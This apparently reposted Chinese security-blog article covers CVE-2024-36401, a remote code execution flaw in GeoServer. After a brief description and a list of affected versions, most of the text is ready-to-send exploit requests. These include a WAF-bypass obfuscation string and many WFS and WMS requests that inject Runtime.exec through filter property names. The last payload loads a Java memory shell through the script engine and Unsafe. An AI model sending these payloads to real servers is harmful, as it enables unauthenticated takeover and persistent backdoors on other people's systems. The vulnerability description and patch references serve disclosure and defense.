GeoServer 是一个开源服务器,允许用户共享和编辑地理空间数据。在 2.23.6、2.24.4 和 2.25.2 之前的版本中,由于不安全地将属性名称评估为 XPath 表达式,多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行 (RCE)。GeoServer 调用的 GeoTools 库 API 以不安全地将它们传递给 commons-jxpath 库的方式评估要素类型的属性名称,该库在评估 XPath 表达式时可以执行任意代码。此 XPath 评估仅供复杂要素类型(即应用程序架构数据存储)使用,但错误地应用于简单要素类型,这使得此漏洞适用于所有GeoServer 实例。虽然没有提供公开的 PoC,但已确认可通过 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求利用此漏洞。此漏洞可能导致执行任意代码。版本 2.23.6、2.24.4 和 2.25.2 包含针对此问题的补丁。有一种解决方法,即从gt-complex-x.y.jarGeoServer 中删除x.yGeoTools 版本的文件(例如,gt-complex-31.1.jar如果运行 GeoServer 2.25.1)。这将从 GeoServer 中删除易受攻击的代码,但可能会破坏某些 GeoServer 功能或阻止 GeoServer 部署(如果需要 gt-complex 模块)。
绕过 waf poc
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep
 	<![CDATA[ (2000) ]]>
获取属性值
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'valueReference='exec(java.lang.Runtime.getRuntime(),"calc")'><wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>
GET /geoserver/wfs?request=GetPropertyValue&service=wfs&typeNames=topp:states&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29&version=2.0.0获取特征
BBOX-1.0
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="1.0.0"xmlns:topp="http://www.openplans.org/topp"xmlns:wfs="http://www.opengis.net/wfs"xmlns:ogc="http://www.opengis.net/ogc"xmlns:gml="http://www.opengis.net/gml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs"><wfs:Query typeName="topp:states"><ogc:Filter><ogc:BBOX><ogc:PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</ogc:PropertyName><gml:Box srsName="http://www.opengis.net/gml/srs/epsg.xml#4326"><gml:coordinates>-75.102613,40.212597 -72.361859,41.512517</gml:coordinates></gml:Box></ogc:BBOX></ogc:Filter></wfs:Query></wfs:GetFeature>
BBOX-1.1
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="1.1.0"xmlns:topp="http://www.openplans.org/topp"xmlns:wfs="http://www.opengis.net/wfs"xmlns:ogc="http://www.opengis.net/ogc"xmlns:gml="http://www.opengis.net/gml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs"><wfs:Query typeName="topp:states"><ogc:Filter><ogc:BBOX><ogc:PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</ogc:PropertyName><gml:Envelope srsName="http://www.opengis.net/gml/srs/epsg.xml#4326"><gml:lowerCorner>-75.102613 40.212597</gml:lowerCorner><gml:upperCorner>-72.361859 41.512517</gml:upperCorner></gml:Envelope></ogc:BBOX></ogc:Filter></wfs:Query></wfs:GetFeature>
1.0/1.1 之间
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="1.0.0"xmlns:topp="http://www.openplans.org/topp"xmlns:wfs="http://www.opengis.net/wfs"xmlns:ogc="http://www.opengis.net/ogc"xmlns:gml="http://www.opengis.net/gml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs"><wfs:Query typeName="topp:states"><ogc:Filter><ogc:PropertyIsBetween><ogc:PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</ogc:PropertyName><ogc:LowerBoundary><ogc:Literal>100000</ogc:Literal></ogc:LowerBoundary><ogc:UpperBoundary><ogc:Literal>150000</ogc:Literal></ogc:UpperBoundary></ogc:PropertyIsBetween></ogc:Filter></wfs:Query></wfs:GetFeature>
GET /geoserver/wfs?request=GetFeature&version=1.1.0&typeName=topp:states&propertyName=STATE_NAME,LAND_KM,the_geom&outputFormat=GML2&FILTER=%3CFilter+xmlns%3D%22http%3A%2F%2Fwww.opengis.net%2Fogc%22%3E%3CPropertyIsBetween%3E%3CPropertyName%3Eexec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29%3C%2FPropertyName%3E%3CLowerBoundary%3E%3CLiteral%3E100000%3C%2FLiteral%3E%3C%2FLowerBoundary%3E%3CUpperBoundary%3E%3CLiteral%3E150000%3C%2FLiteral%3E%3C%2FUpperBoundary%3E%3C%2FPropertyIsBetween%3E%3C%2FFilter%3EIntersects-1.0/1.1
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="1.0.0"xmlns:topp="http://www.openplans.org/topp"xmlns:wfs="http://www.opengis.net/wfs"xmlns="http://www.opengis.net/ogc"xmlns:gml="http://www.opengis.net/gml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs"><wfs:Query typeName="topp:states"><Filter><Intersects><PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</PropertyName></Intersects></Filter></wfs:Query></wfs:GetFeature>
GET /geoserver/wfs?request=GetFeature&version=1.0.0&typeName=topp:states&FILTER=%3CFilter+xmlns%3D%22http%3A%2F%2Fwww.opengis.net%2Fogc%22+xmlns%3Agml%3D%22http%3A%2F%2Fwww.opengis.net%2Fgml%22%3E%3CIntersects%3E%3CPropertyName%3Eexec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29%3C%2FPropertyName%3E%3Cgml%3APoint+srsName%3D%22EPSG%3A4326%22%3E%3Cgml%3Acoordinates%3E-74.817265%2C40.5296504%3C%2Fgml%3Acoordinates%3E%3C%2Fgml%3APoint%3E%3C%2FIntersects%3E%3C%2FFilter%3EPOST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="2.0.0"xmlns:wfs="http://www.opengis.net/wfs/2.0" xmlns:fes="http://www.opengis.net/fes/2.0"xmlns:gml="http://www.opengis.net/gml/3.2" xmlns:sf="http://www.openplans.org/spearfish"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs/2.0 http://schemas.opengis.net/wfs/2.0/wfs.xsdhttp://www.opengis.net/gml/3.2 http://schemas.opengis.net/gml/3.2.1/gml.xsd"><wfs:Query typeNames="sf:bugsites"><fes:Filter><fes:Not><fes:Disjoint><fes:ValueReference>exec(java.lang.Runtime.getRuntime(),"calc")</fes:ValueReference></fes:Disjoint></fes:Not></fes:Filter></wfs:Query></wfs:GetFeature>
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetFeature&typenames=sf:bugsites&filter=%3Cfes%3AFilter+xmlns%3Afes%3D%22http%3A%2F%2Fwww.opengis.net%2Ffes%2F2.0%22+xmlns%3Agml%3D%22http%3A%2F%2Fwww.opengis.net%2Fgml%2F3.2%22%3E%3Cfes%3ANot%3E%3Cfes%3ADisjoint%3E%3Cfes%3AValueReference%3Eexec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29%3C%2Ffes%3AValueReference%3E%3Cgml%3APolygon+gml%3Aid%3D%27polygon.1%27+srsName%3D%27http%3A%2F%2Fwww.opengis.net%2Fdef%2Fcrs%2FEPSG%2F0%2F26713%27%3E%3Cgml%3Aexterior%3E%3Cgml%3ALinearRing%3E%3Cgml%3AposList%3E590431+4915204+590430+4915205+590429+4915204+590430+4915203+590431+4915204%3C%2Fgml%3AposList%3E%3C%2Fgml%3ALinearRing%3E%3C%2Fgml%3Aexterior%3E%3C%2Fgml%3APolygon%3E%3C%2Ffes%3ADisjoint%3E%3C%2Ffes%3ANot%3E%3C%2Ffes%3AFilter%3EMath
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetFeature service="WFS" version="1.0.0"xmlns:topp="http://www.openplans.org/topp"xmlns:wfs="http://www.opengis.net/wfs"xmlns:ogc="http://www.opengis.net/ogc"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.opengis.net/wfs"><wfs:Query typeName="topp:states"><ogc:Filter><ogc:PropertyIsGreaterThan><ogc:Div><ogc:PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</ogc:PropertyName><ogc:PropertyName>xxx</ogc:PropertyName></ogc:Div><ogc:Literal>0.25</ogc:Literal></ogc:PropertyIsGreaterThan></ogc:Filter></wfs:Query></wfs:GetFeature>
GET /geoserver/wfs?request=GetFeature&version=1.1.0&typeName=topp:states&formatName=GML2&FILTER=%3Cogc:Filter%20xmlns:ogc=%22http://www.opengis.net/ogc%22%3E%3Cogc:PropertyIsGreaterThan%3E%3Cogc:Div%3E%3Cogc:PropertyName%3EMANUAL%3C/ogc:PropertyName%3E%3Cogc:PropertyName%3Eexec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29%3C/ogc:PropertyName%3E%3C/ogc:Div%3E%3Cogc:Literal%3E0.25%3C/ogc:Literal%3E%3C/ogc:PropertyIsGreaterThan%3E%3C/ogc:Filter%3EgetMap
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<ogc:GetMap xmlns:ogc="http://www.opengis.net/ows"xmlns:gml="http://www.opengis.net/gml"version="1.2.0"service="WMS"><StyledLayerDescriptor version="1.0.0"xsi:schemaLocation="http://www.opengis.net/sld StyledLayerDescriptor.xsd"xmlns="http://www.opengis.net/sld"xmlns:ogc="http://www.opengis.net/ogc"xmlns:xlink="http://www.w3.org/1999/xlink"xmlns:dave="http://blasby.com"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><UserLayer><Name>Inline</Name><InlineFeature><FeatureCollection><featureMember><BodyPart><Type>Mouth</Type><polygonProperty><gml:Polygon><gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>397,226 396,209 396,196 390,185 384,175 368,163 353,155 331,150 308,149 283,148 261,153 231,163209,175 195,189 186,209 182,221 187,226 193,214 195,205 200,197 203,192 215,185 226,177 241,171256,167 266,163 281,161 297,161 321,160 341,160 359,168 371,175 382,185 388,197 390,215 390,225394,226 397,226</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs></gml:Polygon></polygonProperty></BodyPart></featureMember></FeatureCollection></InlineFeature><UserStyle><FeatureTypeStyle><Rule><Filter><Or><PropertyIsEqualTo><PropertyName>exec(java.lang.Runtime.getRuntime(),"calc")</PropertyName><Literal>Eye</Literal></PropertyIsEqualTo></Or></Filter><PolygonSymbolizer><Fill><CssParameter name="fill"><ogc:Literal>#DD06E0</ogc:Literal></CssParameter><CssParameter name="fill-opacity"><ogc:Literal>1.0</ogc:Literal></CssParameter></Fill><Stroke><CssParameter name="stroke"><ogc:Literal>#FF00FF</ogc:Literal></CssParameter></Stroke></PolygonSymbolizer></Rule></FeatureTypeStyle></UserStyle></UserLayer></StyledLayerDescriptor><BoundingBox><gml:coord><gml:X>0</gml:X><gml:Y>0</gml:Y></gml:coord><gml:coord><gml:X>500</gml:X><gml:Y>500</gml:Y></gml:coord></BoundingBox><Output><Format>image/jpeg</Format><Transparent>false</Transparent><Size><Width>501</Width><Height>501</Height></Size></Output></ogc:GetMap>
GET /geoserver/wms?version=1.3.0&bbox=24,-130,50,-66&Format=image/png&request=GetMap&width=550&height=250&crs=EPSG:4326&SLD_BODY=%3CStyledLayerDescriptor+version%3D%221.1.0%22%3E%3CUserLayer%3E%3CName%3Etopp%3Astates%3C%2FName%3E%3CUserStyle%3E%3CName%3EUserSelection%3C%2FName%3E%3CFeatureTypeStyle%3E%3CRule%3E%3CFilter%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3Eexec%28java.lang.Runtime.getRuntime%28%29%2C%22calc%22%29%3C%2FPropertyName%3E%3CLiteral%3EIllinois%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E%3CPolygonSymbolizer%3E%3CFill%3E%3CSvgParameter+name%3D%22fill%22%3E%23FF0000%3C%2FSvgParameter%3E%3C%2FFill%3E%3C%2FPolygonSymbolizer%3E%3C%2FRule%3E%3CRule%3E%3CLineSymbolizer%3E%3CStroke%2F%3E%3C%2FLineSymbolizer%3E%3C%2FRule%3E%3C%2FFeatureTypeStyle%3E%3C%2FUserStyle%3E%3C%2FUserLayer%3E%3C%2FStyledLayerDescriptor%3EMemery Shell
POST /geoserver/wfs HTTP/1.1Host: 127.0.0.1:8085Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 2<wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'><wfs:Query typeNames='sf:archsites'/><wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'var str="your-base64-memery";var bt;try {bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);} catch (e) {bt = java.util.Base64.getDecoder().decode(str);}var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");theUnsafe.setAccessible(true);unsafe = theUnsafe.get(null);unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();')</wfs:valueReference></wfs:GetPropertyValue>
影响范围:
-
受影响时间 < 2.23.6
-
受影响的版本 >= 2.24.0、< 2.24.4
-
受影响的版本为 >= 2.25.0, < 2.25.2
参考
-
https://xz.aliyun.com/t/14991
-
https://www.cve.org/CVERecord?id=CVE-2024-36401
-
https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
-
https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w
-
https://mp.weixin.qq.com/s/beRJ8-HOMJbA43jYMMS0Pg
-
https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
-
https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst#liststoredqueries
-
https://x.com/isira_adithya/status/1808574915718885610
https://github.com/Mr-xn/CVE-2024-36401原文始发于微信公众号(Ots安全):CVE-2024-36401 远程代码执行 (RCE) 漏洞 绕过 waf poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论